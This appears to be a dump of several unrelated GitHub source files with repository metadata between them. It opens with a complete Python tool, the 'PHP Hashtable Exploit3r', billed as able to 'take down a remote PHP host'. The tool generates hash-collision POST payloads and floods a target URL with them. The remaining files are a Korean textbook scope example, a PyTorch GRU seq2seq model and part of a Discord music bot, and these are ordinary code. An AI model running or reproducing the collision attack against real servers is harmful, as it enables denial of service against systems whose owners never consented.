v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
#############################
# LIBRARIES #
#############################
import socket
import sys, os
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
####################
# Main #
####################
def main():
parser = argparse.ArgumentParser(description="| Take down a remote PHP Host |"
"| Coder Name : WhoAmi |"
"| Team Name : CLAY TeaM |"
,prog="PHP Hashtable Exploit3r v1.0")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB", default=8, type=int)
parser.add_argument("--version", action="version", version="%(prog)s 5.0")
#############################
# FUNCTIONS #
#############################
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
if options.target == "PHP":
payload = generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
#payload = generateJAVAPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = options.maxpayloadsize*1024*1024
payload = payload[:maxinmb]
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def generateASPPayload():
return "a=a"
def generateJAVAPayload():
return "b=b"
def generatePHPPayload():
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = computePHPCollisionChars(5)
return _generatePayload(a, 8);
def _generatePayload(collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = _base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += "" + urllib.quote(result) + "=&"
return post;
def _base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def computePHPCollisionChars(count):
hashes = {}
counter = 0
length = 2
a = ""
for i in range(1, 254):
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = _DJBX33A(basestr)
print("\tValue: %s\tHash: %s" % (basestr, basehash))
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
temphash = _DJBX33A(tempstr)
if temphash == basehash:
print("\tValue: %s\tHash: %s" % (tempstr, temphash))
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
break;
if counter != count:
print("Not enough values found. Please start the script again")
sys.exit(1)
return hashes
def _DJBX(inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(inputstring):
return _DJBX(inputstring, 33, 5381)
#ASP
def _DJBX33X(inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
1f7a73fb2528f3c82b8b5f1b7691f0bf7f9c572a
|
6040ec2771a81654ac41f33ce5c4aa7e66d4e5d9
|
/src/파이썬코드(py)/Ch06/code_6_8_2.py
|
5b3b1e11fc54f5ace2dfd3b7cd1cebb773201c31
|
[] |
no_license
|
jinseoo/DataSciPy
|
a3462785ae094530141e66ead8de9e6519fbf193
|
de6127c0741f8d0cfc989e17ba3a5a65004e5d9c
|
refs/heads/master
| 2023-06-25T19:03:22.086126
| 2021-07-27T09:01:41
| 2021-07-27T09:01:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
#
# 따라하며 배우는 파이썬과 데이터과학(생능출판사 2020)
# 6.8 변수의 범위는 어디까지인가, 155쪽
#
def print_counter():
counter = 200
print('counter =', counter) # 함수 내부의 counter 값
counter = 100
print_counter()
print('counter =', counter) # 함수 외부의 counter 값
|
[
"hojoon1619@gmail.com"
] |
hojoon1619@gmail.com
|
101f2007b71bc63efbdd759b3ee37b183fdd834e
|
a7ba18930a3c84dba19ed0f2f580e6c759e1d0b9
|
/gru_model.py
|
fc37a98f6d4c49e8544c9c4da1aca62c9822d342
|
[] |
no_license
|
soaxelbrooke/twitter-cs-seq2seq
|
4b2dec6badc9f0000702b1fdd0ef17ef91d67d5e
|
c0ca22273150abf76a4a4e2795b7d7d507268d91
|
refs/heads/master
| 2021-07-19T09:05:26.667954
| 2017-10-25T10:32:39
| 2017-10-25T10:32:39
| 106,000,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,672
|
py
|
from collections import deque
import torch
from numpy import ndarray
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
import random
from torch import optim
from tqdm import tqdm
import numpy as np
from typing import NamedTuple
Seq2SeqConfig = NamedTuple('Seq2SeqParams', (
('message_len', int),
('batch_size', int),
('context_size', int),
('embed_size', int),
('use_cuda', bool),
('vocab_size', int),
('start_token', str),
('encoder_layers', int),
('learning_rate', float),
('teacher_force_ratio', float),
))
def build_model(cfg, start_idx, pad_idx):
# type: (Seq2SeqConfig, int, int) -> GruModel
""" Builds a bomb ass model """
shared_embedding = build_shared_embedding(cfg, pad_idx)
encoder = GruEncoder(cfg, shared_embedding, 1)
decoder = GruDecoder(cfg, shared_embedding, 1)
if cfg.use_cuda:
encoder.cuda()
decoder.cuda()
return GruModel(cfg, encoder, decoder, shared_embedding, start_idx)
def build_shared_embedding(cfg, pad_idx):
""" Builds embedding to be used by encoder and decoder """
# type: (Seq2SeqConfig, int) -> nn.Embedding
return nn.Embedding(cfg.vocab_size, cfg.embed_size, padding_idx=int(pad_idx))
class GruModel:
def __init__(self, seq2seq_cfg, encoder, decoder, embedding, start_idx):
# type: (Seq2SeqConfig, GruEncoder, GruDecoder, nn.Embedding, int) -> None
self.cfg = seq2seq_cfg
self.encoder = encoder
self.decoder = decoder
self.embedding = embedding
self.start_idx = start_idx
self.gradient_clip = 5.0
self.teacher_force_ratio = seq2seq_cfg.teacher_force_ratio
self.learning_rate = seq2seq_cfg.learning_rate
self.encoder_optimizer = optim.RMSprop(self.encoder.parameters(), lr=self.learning_rate)
self.decoder_optimizer = optim.RMSprop(self.decoder.parameters(), lr=self.learning_rate)
self.loss_fn = nn.NLLLoss()
def teacher_should_force(self):
return random.random() < self.teacher_force_ratio
def train_epoch(self, train_x, train_y, experiment=None):
# type: (ndarray, ndarray) -> float
""" Trains a single epoch. Returns training loss. """
progress = tqdm(total=len(train_x))
loss_queue = deque(maxlen=256)
train_x = train_x.astype('int64')
train_y = train_y.astype('int64')
idx_iter = zip(range(0, len(train_x) - self.cfg.batch_size, self.cfg.batch_size),
range(self.cfg.batch_size, len(train_x), self.cfg.batch_size))
total_loss = 0
last_step = 1
for step, (start, end) in enumerate(idx_iter):
x_batch = train_x[start:end]
y_batch = train_y[start:end]
if (len(x_batch) == 0) or (len(y_batch) == 0):
break
x_batch = torch.LongTensor(x_batch)
y_batch = torch.LongTensor(y_batch)
if self.cfg.use_cuda:
x_batch = x_batch.cuda()
y_batch = y_batch.cuda()
loss = self._train_inner(
Variable(x_batch.view(-1, self.cfg.batch_size)),
Variable(y_batch.view(-1, self.cfg.batch_size)),
)
if (experiment is not None) and ((step + 1) % 20 == 0):
experiment.log_metric('loss', np.mean(loss_queue))
total_loss += loss
loss_queue.append(loss)
progress.set_postfix(loss=np.mean(loss_queue), refresh=False)
progress.update(self.cfg.batch_size)
last_step = step + 1
avg_loss = total_loss / last_step
if experiment is not None:
experiment.log_metric('loss', avg_loss)
return avg_loss
def _train_inner(self, input_var_batch, target_var_batch):
# type: (ndarray, ndarray) -> float
self.encoder_optimizer.zero_grad()
self.decoder_optimizer.zero_grad()
loss = 0
enc_hidden_state = self.encoder.init_hidden()
encoder_outputs, decoder_hidden = self.encoder(input_var_batch, enc_hidden_state)
decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
if self.cfg.use_cuda:
decoder_input = decoder_input.cuda()
should_use_teacher = self.teacher_should_force()
for input_idx in range(self.cfg.message_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
loss += self.loss_fn(decoder_output, target_var_batch[input_idx, :])
if should_use_teacher:
decoder_input = target_var_batch[input_idx, :]
else:
# Get the highest values and their indexes over axis 1
top_vals, top_idxs = decoder_output.data.topk(1)
decoder_input = Variable(top_idxs.squeeze())
loss.backward()
nn.utils.clip_grad_norm(self.encoder.parameters(), self.gradient_clip)
nn.utils.clip_grad_norm(self.decoder.parameters(), self.gradient_clip)
self.encoder_optimizer.step()
self.decoder_optimizer.step()
return loss.data.sum() / self.cfg.message_len
def predict(self, requests):
""" Predict a response for this request """
# type: (ndarray) -> ndarray
x = torch.LongTensor(requests.astype('int64')).view(-1, self.cfg.batch_size)
if self.cfg.use_cuda:
x = x.cuda()
encoder_outputs, decoder_hidden = self.encoder(Variable(x), self.encoder.init_hidden())
decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
decoder_outputs = \
torch.LongTensor([[self.start_idx]] * self.cfg.batch_size * self.cfg.message_len)\
.view(self.cfg.message_len, self.cfg.batch_size)
if self.cfg.use_cuda:
decoder_input = decoder_input.cuda()
should_use_teacher = self.teacher_should_force()
for input_idx in range(self.cfg.message_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
top_vals, top_idxs = decoder_output.data.topk(1)
decoder_input = Variable(top_idxs.squeeze())
decoder_outputs[input_idx, :] = top_idxs.squeeze()
return decoder_outputs.numpy().T
def evaluate(self, test_x, test_y):
# type: (ndarray, ndarray) -> float
""" Evaluates model quality on test dataset, returning loss. """
class GruEncoder(nn.Module):
def __init__(self, seq2seq_params, embedding, n_layers=1):
# type: (Seq2SeqConfig, nn.Embedding, int) -> None
super(GruEncoder, self).__init__()
self.cfg = seq2seq_params
self.n_layers = seq2seq_params.encoder_layers
self.embedding = embedding
self.rnn = nn.GRU(
input_size=self.cfg.embed_size,
hidden_size=self.cfg.context_size,
num_layers=self.n_layers,
)
def forward(self, word_idxs, hidden_state):
embedded = self.embedding(word_idxs) \
.view(self.cfg.message_len, self.cfg.batch_size, self.cfg.embed_size)
out, hidden = self.rnn(embedded, hidden_state)
return out[-1].unsqueeze(0), hidden[-1].unsqueeze(0)
def init_hidden(self):
hidden = Variable(torch.zeros(self.n_layers, self.cfg.batch_size, self.cfg.context_size))
return hidden.cuda() if self.cfg.use_cuda else hidden
class GruDecoder(nn.Module):
def __init__(self, seq2seq_params, embedding, n_layers, dropout_p=0.1):
# type: (Seq2SeqConfig, nn.Embedding, int, float) -> None
super(GruDecoder, self).__init__()
self.cfg = seq2seq_params
self.n_layers = n_layers
self.dropout_p = dropout_p
self.embedding = embedding
self.dropout = nn.Dropout(self.dropout_p)
self.rnn = nn.GRU(
input_size=self.cfg.embed_size,
hidden_size=self.cfg.context_size,
num_layers=self.n_layers,
dropout=self.dropout_p,
)
self.out = nn.Linear(self.cfg.context_size, self.cfg.vocab_size)
def forward(self, word_idx_slice, last_hidden_state):
""" Processes a single slice of the minibatch - a single word per row """
embedded_words = self.embedding(word_idx_slice) \
.view(1, self.cfg.batch_size, self.cfg.embed_size)
post_dropout_words = self.dropout(embedded_words)
output, hidden_state = self.rnn(post_dropout_words, last_hidden_state)
word_dist = F.log_softmax(self.out(output.squeeze(0)))
return word_dist, hidden_state
|
[
"stuart@axelbrooke.com"
] |
stuart@axelbrooke.com
|
9c4146cf8d2c46ce68c4b555792e4dfbf0abee79
|
bb0fc24a46415c6780f734e4d7a6d9a8b203b02b
|
/musicbot/bot.py
|
49fe612d7542a775817784cf3f3f7dee10b9d6a2
|
[
"MIT"
] |
permissive
|
EZIO1337/papiezbotv6
|
b1880a1f4401737038c97499036e803def801496
|
dd93f8ca2d43a76517170bd4ea192524d66fb337
|
refs/heads/master
| 2021-05-16T14:41:37.671601
| 2018-01-22T23:25:26
| 2018-01-22T23:25:26
| 118,528,619
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 108,261
|
py
|
import os
import sys
import time
import shlex
import shutil
import random
import inspect
import logging
import asyncio
import pathlib
import traceback
import math
import re
import aiohttp
import discord
import colorlog
from io import BytesIO, StringIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from collections import defaultdict
from discord.enums import ChannelType
from discord.ext.commands.bot import _get_variable
from . import exceptions
from . import downloader
from .playlist import Playlist
from .player import MusicPlayer
from .entry import StreamPlaylistEntry
from .opus_loader import load_opus_lib
from .config import Config, ConfigDefaults
from .permissions import Permissions, PermissionsDefaults
from .constructs import SkipState, Response, VoiceStateUpdate
from .utils import load_file, write_file, fixg, ftimedelta, _func_
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
load_opus_lib()
log = logging.getLogger(__name__)
class MusicBot(discord.Client):
def __init__(self, config_file=None, perms_file=None):
try:
sys.stdout.write("\x1b]2;MusicBot {}\x07".format(BOTVERSION))
except:
pass
if config_file is None:
config_file = ConfigDefaults.options_file
if perms_file is None:
perms_file = PermissionsDefaults.perms_file
self.players = {}
self.exit_signal = None
self.init_ok = False
self.cached_app_info = None
self.last_status = None
self.config = Config(config_file)
self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])
self.blacklist = set(load_file(self.config.blacklist_file))
self.autoplaylist = load_file(self.config.auto_playlist_file)
self.autoplaylist_session = self.autoplaylist[:]
self.aiolocks = defaultdict(asyncio.Lock)
self.downloader = downloader.Downloader(download_folder='audio_cache')
self._setup_logging()
log.info(' MusicBot (version {}) '.format(BOTVERSION).center(50, '='))
if not self.autoplaylist:
log.warning("Autoplaylist is empty, disabling.")
self.config.auto_playlist = False
else:
log.info("Loaded autoplaylist with {} entries".format(len(self.autoplaylist)))
if self.blacklist:
log.debug("Loaded blacklist with {} entries".format(len(self.blacklist)))
# TODO: Do these properly
ssd_defaults = {
'last_np_msg': None,
'auto_paused': False,
'availability_paused': False
}
self.server_specific_data = defaultdict(ssd_defaults.copy)
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
def __del__(self):
# These functions return futures but it doesn't matter
try: self.http.session.close()
except: pass
try: self.aiosession.close()
except: pass
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
# TODO: Add some sort of `denied` argument for a message to send when someone else tries to use it
def owner_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
# Only allow the owner to use these commands
orig_msg = _get_variable('message')
if not orig_msg or orig_msg.author.id == self.config.owner_id:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only the owner can use this command", expire_in=30)
return wrapper
def dev_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
orig_msg = _get_variable('message')
if orig_msg.author.id in self.config.dev_ids:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only dev users can use this command", expire_in=30)
wrapper.dev_cmd = True
return wrapper
def ensure_appinfo(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
await self._cache_app_info()
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
return wrapper
def _get_owner(self, *, server=None, voice=False):
return discord.utils.find(
lambda m: m.id == self.config.owner_id and (m.voice_channel if voice else True),
server.members if server else self.get_all_members()
)
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + '__')
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + '__', path)
return False
return True
def _setup_logging(self):
if len(logging.getLogger(__package__).handlers) > 1:
log.debug("Skipping logger setup, already set up")
return
shandler = logging.StreamHandler(stream=sys.stdout)
shandler.setFormatter(colorlog.LevelFormatter(
fmt = {
'DEBUG': '{log_color}[{levelname}:{module}] {message}',
'INFO': '{log_color}{message}',
'WARNING': '{log_color}{levelname}: {message}',
'ERROR': '{log_color}[{levelname}:{module}] {message}',
'CRITICAL': '{log_color}[{levelname}:{module}] {message}',
'EVERYTHING': '{log_color}[{levelname}:{module}] {message}',
'NOISY': '{log_color}[{levelname}:{module}] {message}',
'VOICEDEBUG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}',
'FFMPEG': '{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}'
},
log_colors = {
'DEBUG': 'cyan',
'INFO': 'white',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
'EVERYTHING': 'white',
'NOISY': 'white',
'FFMPEG': 'bold_purple',
'VOICEDEBUG': 'purple',
},
style = '{',
datefmt = ''
))
shandler.setLevel(self.config.debug_level)
logging.getLogger(__package__).addHandler(shandler)
log.debug("Set logging level to {}".format(self.config.debug_level_str))
if self.config.debug_mode:
dlogger = logging.getLogger('discord')
dlogger.setLevel(logging.DEBUG)
dhandler = logging.FileHandler(filename='logs/discord.log', encoding='utf-8', mode='w')
dhandler.setFormatter(logging.Formatter('{asctime}:{levelname}:{name}: {message}', style='{'))
dlogger.addHandler(dhandler)
@staticmethod
def _check_if_empty(vchannel: discord.Channel, *, excluding_me=True, excluding_deaf=False):
def check(member):
if excluding_me and member == vchannel.server.me:
return False
if excluding_deaf and any([member.deaf, member.self_deaf]):
return False
return True
return not sum(1 for m in vchannel.voice_members if check(m))
async def _join_startup_channels(self, channels, *, autosummon=True):
joined_servers = set()
channel_map = {c.server: c for c in channels}
def _autopause(player):
if self._check_if_empty(player.voice_client.channel):
log.info("Initial autopause in empty channel")
player.pause()
self.server_specific_data[player.voice_client.channel.server]['auto_paused'] = True
for server in self.servers:
if server.unavailable or server in channel_map:
continue
if server.me.voice_channel:
log.info("Found resumable voice channel {0.server.name}/{0.name}".format(server.me.voice_channel))
channel_map[server] = server.me.voice_channel
if autosummon:
owner = self._get_owner(server=server, voice=True)
if owner:
log.info("Found owner in \"{}\"".format(owner.voice_channel.name))
channel_map[server] = owner.voice_channel
for server, channel in channel_map.items():
if server in joined_servers:
log.info("Already joined a channel in \"{}\", skipping".format(server.name))
continue
if channel and channel.type == discord.ChannelType.voice:
log.info("Attempting to join {0.server.name}/{0.name}".format(channel))
chperms = channel.permissions_for(server.me)
if not chperms.connect:
log.info("Cannot join channel \"{}\", no permission.".format(channel.name))
continue
elif not chperms.speak:
log.info("Will not join channel \"{}\", no permission to speak.".format(channel.name))
continue
try:
player = await self.get_player(channel, create=True, deserialize=self.config.persistent_queue)
joined_servers.add(server)
log.info("Joined {0.server.name}/{0.name}".format(channel))
if player.is_stopped:
player.play()
if self.config.auto_playlist and not player.playlist.entries:
await self.on_player_finished_playing(player)
if self.config.auto_pause:
player.once('play', lambda player, **_: _autopause(player))
except Exception:
log.debug("Error joining {0.server.name}/{0.name}".format(channel), exc_info=True)
log.error("Failed to join {0.server.name}/{0.name}".format(channel))
elif channel:
log.warning("Not joining {0.server.name}/{0.name}, that's a text channel.".format(channel))
else:
log.warning("Invalid channel thing: {}".format(channel))
async def _wait_delete_msg(self, message, after):
await asyncio.sleep(after)
await self.safe_delete_message(message, quiet=True)
# TODO: Check to see if I can just move this to on_message after the response check
async def _manual_delete_check(self, message, *, quiet=False):
if self.config.delete_invoking:
await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
vc = msg.server.me.voice_channel
# If we've connected to a voice chat and we're in the same voice channel
if not vc or vc == msg.author.voice_channel:
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)" % vc.name, expire_in=30)
async def _cache_app_info(self, *, update=False):
if not self.cached_app_info and not update and self.user.bot:
log.debug("Caching app info")
self.cached_app_info = await self.application_info()
return self.cached_app_info
async def remove_from_autoplaylist(self, song_url:str, *, ex:Exception=None, delete_from_ap=False):
if song_url not in self.autoplaylist:
log.debug("URL \"{}\" not in autoplaylist, ignoring".format(song_url))
return
async with self.aiolocks[_func_()]:
self.autoplaylist.remove(song_url)
log.info("Removing unplayable song from autoplaylist: %s" % song_url)
with open(self.config.auto_playlist_removed_file, 'a', encoding='utf8') as f:
f.write(
'# Entry removed {ctime}\n'
'# Reason: {ex}\n'
'{url}\n\n{sep}\n\n'.format(
ctime=time.ctime(),
ex=str(ex).replace('\n', '\n#' + ' ' * 10), # 10 spaces to line up with # Reason:
url=song_url,
sep='#' * 32
))
if delete_from_ap:
log.info("Updating autoplaylist")
write_file(self.config.auto_playlist_file, self.autoplaylist)
@ensure_appinfo
async def generate_invite_link(self, *, permissions=discord.Permissions(70380544), server=None):
return discord.utils.oauth_url(self.cached_app_info.id, permissions=permissions, server=server)
async def join_voice_channel(self, channel):
if isinstance(channel, discord.Object):
channel = self.get_channel(channel.id)
if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
raise discord.InvalidArgument('Channel passed must be a voice channel')
server = channel.server
if self.is_voice_connected(server):
raise discord.ClientException('Already connected to a voice channel in this server')
def session_id_found(data):
user_id = data.get('user_id')
guild_id = data.get('guild_id')
return user_id == self.user.id and guild_id == server.id
log.voicedebug("(%s) creating futures", _func_())
# register the futures for waiting
session_id_future = self.ws.wait_for('VOICE_STATE_UPDATE', session_id_found)
voice_data_future = self.ws.wait_for('VOICE_SERVER_UPDATE', lambda d: d.get('guild_id') == server.id)
# "join" the voice channel
log.voicedebug("(%s) setting voice state", _func_())
await self.ws.voice_state(server.id, channel.id)
log.voicedebug("(%s) waiting for session id", _func_())
session_id_data = await asyncio.wait_for(session_id_future, timeout=15, loop=self.loop)
# sometimes it gets stuck on this step. Jake said to wait indefinitely. To hell with that.
log.voicedebug("(%s) waiting for voice data", _func_())
data = await asyncio.wait_for(voice_data_future, timeout=15, loop=self.loop)
kwargs = {
'user': self.user,
'channel': channel,
'data': data,
'loop': self.loop,
'session_id': session_id_data.get('session_id'),
'main_ws': self.ws
}
voice = discord.VoiceClient(**kwargs)
try:
log.voicedebug("(%s) connecting...", _func_())
with aiohttp.Timeout(15):
await voice.connect()
except asyncio.TimeoutError as e:
log.voicedebug("(%s) connection failed, disconnecting", _func_())
try:
await voice.disconnect()
except:
pass
raise e
log.voicedebug("(%s) connection successful", _func_())
self.connection._add_voice_client(server.id, voice)
return voice
async def get_voice_client(self, channel: discord.Channel):
if isinstance(channel, discord.Object):
channel = self.get_channel(channel.id)
if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
raise AttributeError('Channel passed must be a voice channel')
async with self.aiolocks[_func_() + ':' + channel.server.id]:
if self.is_voice_connected(channel.server):
return self.voice_client_in(channel.server)
vc = None
t0 = t1 = 0
tries = 5
for attempt in range(1, tries+1):
log.debug("Connection attempt {} to {}".format(attempt, channel.name))
t0 = time.time()
try:
vc = await self.join_voice_channel(channel)
t1 = time.time()
break
except asyncio.TimeoutError:
log.warning("Failed to connect, retrying ({}/{})".format(attempt, tries))
# TODO: figure out if I need this or not
# try:
# await self.ws.voice_state(channel.server.id, None)
# except:
# pass
except:
log.exception("Unknown error attempting to connect to voice")
await asyncio.sleep(0.5)
if not vc:
log.critical("Voice client is unable to connect, restarting...")
await self.restart()
log.debug("Connected in {:0.1f}s".format(t1-t0))
log.info("Connected to {}/{}".format(channel.server, channel))
vc.ws._keep_alive.name = 'VoiceClient Keepalive'
return vc
async def reconnect_voice_client(self, server, *, sleep=0.1, channel=None):
log.debug("Reconnecting voice client on \"{}\"{}".format(
server, ' to "{}"'.format(channel.name) if channel else ''))
async with self.aiolocks[_func_() + ':' + server.id]:
vc = self.voice_client_in(server)
if not (vc or channel):
return
_paused = False
player = self.get_player_in(server)
if player and player.is_playing:
log.voicedebug("(%s) Pausing", _func_())
player.pause()
_paused = True
log.voicedebug("(%s) Disconnecting", _func_())
try:
await vc.disconnect()
except:
pass
if sleep:
log.voicedebug("(%s) Sleeping for %s", _func_(), sleep)
await asyncio.sleep(sleep)
if player:
log.voicedebug("(%s) Getting voice client", _func_())
if not channel:
new_vc = await self.get_voice_client(vc.channel)
else:
new_vc = await self.get_voice_client(channel)
log.voicedebug("(%s) Swapping voice client", _func_())
await player.reload_voice(new_vc)
if player.is_paused and _paused:
log.voicedebug("Resuming")
player.resume()
log.debug("Reconnected voice client on \"{}\"{}".format(
server, ' to "{}"'.format(channel.name) if channel else ''))
async def disconnect_voice_client(self, server):
vc = self.voice_client_in(server)
if not vc:
return
if server.id in self.players:
self.players.pop(server.id).kill()
await vc.disconnect()
async def disconnect_all_voice_clients(self):
for vc in list(self.voice_clients).copy():
await self.disconnect_voice_client(vc.channel.server)
async def set_voice_state(self, vchannel, *, mute=False, deaf=False):
if isinstance(vchannel, discord.Object):
vchannel = self.get_channel(vchannel.id)
if getattr(vchannel, 'type', ChannelType.text) != ChannelType.voice:
raise AttributeError('Channel passed must be a voice channel')
await self.ws.voice_state(vchannel.server.id, vchannel.id, mute, deaf)
# I hope I don't have to set the channel here
# instead of waiting for the event to update it
def get_player_in(self, server: discord.Server) -> MusicPlayer:
return self.players.get(server.id)
async def get_player(self, channel, create=False, *, deserialize=False) -> MusicPlayer:
server = channel.server
async with self.aiolocks[_func_() + ':' + server.id]:
if deserialize:
voice_client = await self.get_voice_client(channel)
player = await self.deserialize_queue(server, voice_client)
if player:
log.debug("Created player via deserialization for server %s with %s entries", server.id, len(player.playlist))
# Since deserializing only happens when the bot starts, I should never need to reconnect
return self._init_player(player, server=server)
if server.id not in self.players:
if not create:
raise exceptions.CommandError(
'Papież nie jest na kanale głosowym.. '
'Zawołaj pedofila używając %sdj aby wezwać najlepszego Didżeja w Watykanie!' % self.config.command_prefix)
voice_client = await self.get_voice_client(channel)
playlist = Playlist(self)
player = MusicPlayer(self, voice_client, playlist)
self._init_player(player, server=server)
async with self.aiolocks[self.reconnect_voice_client.__name__ + ':' + server.id]:
if self.players[server.id].voice_client not in self.voice_clients:
log.debug("Reconnect required for voice client in {}".format(server.name))
await self.reconnect_voice_client(server, channel=channel)
return self.players[server.id]
def _init_player(self, player, *, server=None):
player = player.on('graj', self.on_player_play) \
.on('odpauzuj', self.on_player_resume) \
.on('pauza', self.on_player_pause) \
.on('stop', self.on_player_stop) \
.on('finished-playing', self.on_player_finished_playing) \
.on('entry-added', self.on_player_entry_added) \
.on('error', self.on_player_error)
player.skip_state = SkipState()
if server:
self.players[server.id] = player
return player
async def on_player_play(self, player, entry):
await self.update_now_playing_status(entry)
player.skip_state.reset()
